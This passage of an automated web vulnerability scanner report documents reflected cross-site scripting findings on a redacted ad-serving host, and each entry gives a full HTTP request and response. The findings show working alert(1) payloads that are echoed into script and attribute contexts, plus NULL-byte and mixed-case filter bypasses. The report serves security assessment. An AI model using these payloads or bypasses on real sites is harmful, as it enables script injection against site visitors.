Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7817
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 00:07:25 GMT

<html><head><title>F00918_Win7HGAPhotoFuse_300x250_EN</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0p
...[SNIP]...
//bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=&%00d8afa'-alert(1)-'eebb67c14ef=1');
}
else
{
_strContentCHP1289921248084 = '<a target="_blank" href="http://clk.atdmt.com/go/164326682/direct;wi.300;hi.250;ai.186052997.187367607.191242118;ct.1/01/" onclick="if(\'http://bell
...[SNIP]...

2.718. http://redcated/D21/iview/164326682/direct [wi.300;hi.250/01/8450819519?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /D21/iview/164326682/direct

Issue detail

The value of the wi.300;hi.250/01/8450819519?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3d48'-alert(1)-'b2078f7ad0d was submitted in the wi.300;hi.250/01/8450819519?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /D21/iview/164326682/direct;wi.300;hi.250/01/8450819519?click=b3d48'-alert(1)-'b2078f7ad0d HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://news.sympatico.ca/Home
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6771
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 00:07:04 GMT

<html><head><title>F00918_Win7HGA_HDChat_300x250_EN</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;
...[SNIP]...
;
if ( "%OOB%" == "1" )
_strContentCHP1289921638898 = _strContentCHP1289921638898.replace(/!~!click!~!/g,'');
else
_strContentCHP1289921638898 = _strContentCHP1289921638898.replace(/!~!click!~!/g,'b3d48'-alert(1)-'b2078f7ad0d');
}
else
{
_strContentCHP1289921638898 = '<a target="_blank" href="http://clk.atdmt.com/go/164326682/direct;wi.300;hi.250;ai.186052997.187367617.191242435;ct.1/01/" onclick="if(\'b3d48'-alert(
...[SNIP]...

2.719. http://redcated/D21/iview/164326682/direct [wi.300;hi.250/01/8450819519?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /D21/iview/164326682/direct

Issue detail

The value of the wi.300;hi.250/01/8450819519?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af967</script><script>alert(1)</script>618045fa3c3 was submitted in the wi.300;hi.250/01/8450819519?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /D21/iview/164326682/direct;wi.300;hi.250/01/8450819519?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=af967</script><script>alert(1)</script>618045fa3c3 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://news.sympatico.ca/Home
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 2630
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 00:06:55 GMT

<SCRIPT Language="Javascript">
var DCcode = "N3995.275551.SYMPATICOCANADA/B5002719";
var DCwidth = "300";
var DCheight = "250";
var randNum = Math.floor(Math.random() * 100000000) + 100000000;
va
...[SNIP]...
ttp://bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=af967</script><script>alert(1)</script>618045fa3c3http://clk.redcated/goiframe/189498318.189844667/164326682/direct/01%3fhref=";
var scriptsrc = "http://ad.doubleclick.net/adj/" + DCcode + ";abr=!ie;sz=" + DCwidth + "x" + DCheight + ";ord=" + randNu
...[SNIP]...

2.720. http://redcated/D21/iview/164327256/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /D21/iview/164327256/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64954"-alert(1)-"7f8efb7997d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /D21/iview/164327256/direct;wi.728;hi.90/01/8450819519?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054a95554fdf00000000/vibe=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=&64954"-alert(1)-"7f8efb7997d=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://news.sympatico.ca/Home
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 2538
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 00:06:52 GMT

<SCRIPT Language="Javascript">
var DCcode = "N5305.2564.SYMPATICO.CA/B4902084.4";
var DCwidth = "728";
var DCheight = "90";
var randNum = Math.floor(Math.random() * 100000000) + 100000000;
var if
...[SNIP]...
ttp://bellcan.adbureau.net/accipiter/adclick/CID=0000054a95554fdf00000000/vibe=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=&64954"-alert(1)-"7f8efb7997d=1http://clk.redcated/goiframe/186315411.186341297/164327256/direct/01?href=";
var scriptsrc = "http://ad.doubleclick.net/adj/" + DCcode + ";abr=!ie;sz=" + DCwidth + "x" + DCheight + ";ord=" + randNu
...[SNIP]...

2.721. http://redcated/D21/iview/164327256/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /D21/iview/164327256/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e1eae"><ScRiPt>alert(1)</ScRiPt>788b1b07a23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e1eae"><ScRiPt>alert(1)</ScRiPt>788b1b07a23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /D21/iview/164327256/direct;wi.728;hi.90/01/8450819519?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054a95554fdf00000000/vibe=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=&%00e1eae"><ScRiPt>alert(1)</ScRiPt>788b1b07a23=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://news.sympatico.ca/Home
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7539
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 01:32:19 GMT

<html><head><title>SCF11_240_black_friday_en_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;
...[SNIP]...
://bellcan.adbureau.net/accipiter/adclick/CID=0000054a95554fdf00000000/vibe=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=&%00e1eae"><ScRiPt>alert(1)</ScRiPt>788b1b07a23=1\')(new Image).src=\'http://bellcan.adbureau.net/accipiter/adclick/CID=0000054a95554fdf00000000/vibe=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/page
...[SNIP]...

2.722. http://redcated/D21/iview/164327256/direct [wi.728;hi.90/01/8450819519?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /D21/iview/164327256/direct

Issue detail

The value of the wi.728;hi.90/01/8450819519?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35780</script><script>alert(1)</script>c83d105aa8 was submitted in the wi.728;hi.90/01/8450819519?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /D21/iview/164327256/direct;wi.728;hi.90/01/8450819519?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054a95554fdf00000000/vibe=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=35780</script><script>alert(1)</script>c83d105aa8 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://news.sympatico.ca/Home
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7543
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 00:06:37 GMT

<html><head><title>SCF11_240_black_friday_en_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;
...[SNIP]...
http://bellcan.adbureau.net/accipiter/adclick/CID=0000054a95554fdf00000000/vibe=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=35780</script><script>alert(1)</script>c83d105aa8",
clickThruUrl: "http://clk.redcated/go/164327256/direct;wi.728;hi.90;ai.189546036.192014510;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function
...[SNIP]...

2.723. http://redcated/D21/iview/164327256/direct [wi.728;hi.90/01/8450819519?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /D21/iview/164327256/direct

Issue detail

The value of the wi.728;hi.90/01/8450819519?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 817a0'-alert(1)-'36ee284f8a4 was submitted in the wi.728;hi.90/01/8450819519?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /D21/iview/164327256/direct;wi.728;hi.90/01/8450819519?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054a95554fdf00000000/vibe=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=817a0'-alert(1)-'36ee284f8a4 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://news.sympatico.ca/Home
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7864
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 00:06:43 GMT

<html>
<head>
<title>1025_ANZCA_Mltstop_LPANZ_267863292_728x90_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body s
...[SNIP]...
http://bellcan.adbureau.net/accipiter/adclick/CID=0000054a95554fdf00000000/vibe=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=817a0'-alert(1)-'36ee284f8a4');
}
else
{
_strContentNZC9361916897397 = '<a target="_blank" href="http://clk.atdmt.com/go/164327256/direct;wi.728;hi.90;ai.188415338.188377349.188136077;ct.1/01/" onclick="if(\'http://bellcan
...[SNIP]...

2.724. http://redcated/D21/iview/170469798/direct [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /D21/iview/170469798/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0100'%3be58da30deea was submitted in the REST URL parameter 4. This input was echoed as e0100';e58da30deea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /D21/iview/170469798/directe0100'%3be58da30deea;wi.300;hi.250/01/5979345757?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000099fd166104000000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.RON/AAMGNRC1=AdManagerResponse/area=SYMPATICO/ACC_RANDOM=5979345757/pageid=8987153005/relocate= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://en.info.sympatico.ca/directory/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7636
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 00:06:53 GMT

<html><head><title>LG_HA_Contest_Banners_300x250_product_EN_001</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="borde
...[SNIP]...
aram name="movie" value="HTTP://spe.atdmt.com/ds/D2D21CANALGP/LGActiveMedia_10222010/LG_HA_Contest_Banners_300x250_product_EN_001.swf?ver=1&clickTag1=!~!click!~!http://clk.atdmt.com/go/170469798/directe0100';e58da30deea;wi.300;hi.250;ai.186838354.187630957;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/170469798/directe0100';e58da30deea;wi.300;hi.250;ai.186838354.187630957;ct.1/01" />
...[SNIP]...

2.725. http://redcated/D21/iview/170469798/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /D21/iview/170469798/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 503c3"><ScRiPt>alert(1)</ScRiPt>d27b9e5c3dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /D21/iview/170469798/direct;wi.300;hi.250/01/5979345757?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000099fd166104000000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.RON/AAMGNRC1=AdManagerResponse/area=SYMPATICO/ACC_RANDOM=5979345757/pageid=8987153005/relocate=&503c3"><ScRiPt>alert(1)</ScRiPt>d27b9e5c3dc=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://en.info.sympatico.ca/directory/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6135
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 00:05:20 GMT

<html><head><title>ZellersToy_New300x250_V3_003.tpl</title><meta HTTP-EQUIV="expires" CONTENT="0" /><meta HTTP-EQUIV="Pragma" CONTENT="no-cache" /><script LANGUAGE="JavaScript" type="text/javascript">
...[SNIP]...
